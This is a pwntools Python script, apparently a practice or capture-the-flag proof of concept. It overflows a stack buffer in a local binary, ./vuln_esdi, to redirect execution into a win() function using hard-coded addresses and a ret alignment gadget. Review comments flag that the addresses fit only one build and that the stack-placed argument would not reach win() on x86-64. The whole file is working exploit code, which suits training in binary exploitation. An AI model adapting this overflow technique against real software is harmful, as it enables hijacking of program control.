from pwn import *
# Overflow proof-of-concept for the local practice binary ./vuln_esdi.
# It sends an over-long answer to the "Enter your name: " prompt so that the
# 8-byte slots following the filler are replaced with chosen values.
# NOTE(review): every address here is hard-coded, so the script presumably
# targets one specific non-PIE build; confirm against the binary. A stack
# canary or position-independent build would invalidate these constants.

# The ELF object is not referenced again below; the load is kept as-is.
elf = ELF('./vuln_esdi')

# Number of filler bytes written before the first overwritten 8-byte slot.
offset = 272

# Presumably the address of a bare `ret`, used only to keep the stack
# 16-byte aligned before entering win() -- TODO confirm in the disassembly.
ret_addr = 0x401016

# Address of win() in this build.
win_addr = 0x401156

# Dummy value intended as an argument for win() (e.g. 0xdeadbeef).
# NOTE(review): if the target is x86-64 System V, integer arguments travel in
# registers, so this word is not received by win() as a parameter; it only
# occupies the stack slot that follows win_addr. Verify what win() expects.
fake_arg = 0xdeadbeef

payload = b''.join([
    b'A' * offset,    # filler up to the overwritten slot
    p64(ret_addr),    # alignment
    p64(win_addr),    # address of win()
    p64(fake_arg),    # intended argument for win() (see note above)
])

# Run the binary locally, wait for the prompt, deliver the input, then hand
# the session over to the operator.
io = process('./vuln_esdi')
io.recvuntil(b"Enter your name: ")
io.sendline(payload)
io.interactive()